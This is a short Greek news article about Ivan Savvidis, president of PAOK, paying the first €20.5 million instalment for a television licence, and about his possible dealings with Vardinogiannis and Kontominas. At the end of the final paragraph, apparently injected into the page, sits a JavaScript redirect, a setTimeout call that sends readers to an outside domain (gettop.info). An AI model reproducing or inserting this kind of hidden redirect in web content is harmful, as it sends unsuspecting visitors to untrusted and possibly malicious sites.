Ο Ιβάν έβαλε τα λεφτά, βλέπει Τζίγκερ, ο Κοντομηνάς ανησυχεί

0
12

 

Λίγοι πίστευαν ότι ο Ιβάν Σαββίδης θα κατέθετε 20,5 εκατ. ευρώ, ως πρώτη δόση του συνολικού τιμήματος των 61,5 εκατ ευρώ, για να πάρει τηλεοπτική άδεια.

Μετά τις δηλώσεις του ότι είχε στόχο να φουσκώσει την αξία κάθε άδειας και ότι στο τέλος κατέθετε μηδενικές προσφορές, οι περισσότεροι ανέμεναν πως θα αποσυρόταν μετά την έκπτωση του Γιάννη Βλαδίμηρου Καλογρίτσα και θα παραχωρούσε τη θέση του στον Δημήτρη Κοντομηνά, ο οποίος είχε καταθέσει προσφορά μόλις μισό εκατ. μικρότερη -δηλαδή 61 εκατ ευρώ.

Ωστόσο ο πρόεδρος του ΠΑΟΚ ανέτρεψε τα προγνωστικά. Έδωσε τα χρήματα, δήλωσε πως δεν επιθυμεί να συζητήσει με τον ιδιοκτήτη του Alpha και έκλεισε ραντεβού με τον Γιάννη Βαρδινογιάννη, ο οποίος δεν εξασφάλισε άδεια καθώς προσέφερε 18 εκατ ευρώ.

Η λογική λέει πως ο Σαββίδης θα ζητήσει συνεργασία στη λογική «έχω άδεια, έχεις στημένο κανάλι με έτοιμες υποδομές και έμπειρους επαγγελματίες, ας τα βρούμε«. Το ερώτημα, βέβαια, είναι σε ποια βάση μπορούν να τα βρουν. Θα ζητήσει ο πρόεδρος του ΠΑΟΚ, ως αδειούχος, το μάνατζμεντ και την πλειοψηφία; Και αν το κάνει, θα του τα προσφέρει ο «Τζίγκερ»;

Σε κάθε περίπτωση, χαμένος φαίνεται να είναι -σε τούτη τη φάση, τουλάχιστον- ο ιδιοκτήτης του Alpha. Ωστόσο υπάρχει πολύς δρόμος ακόμη… setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here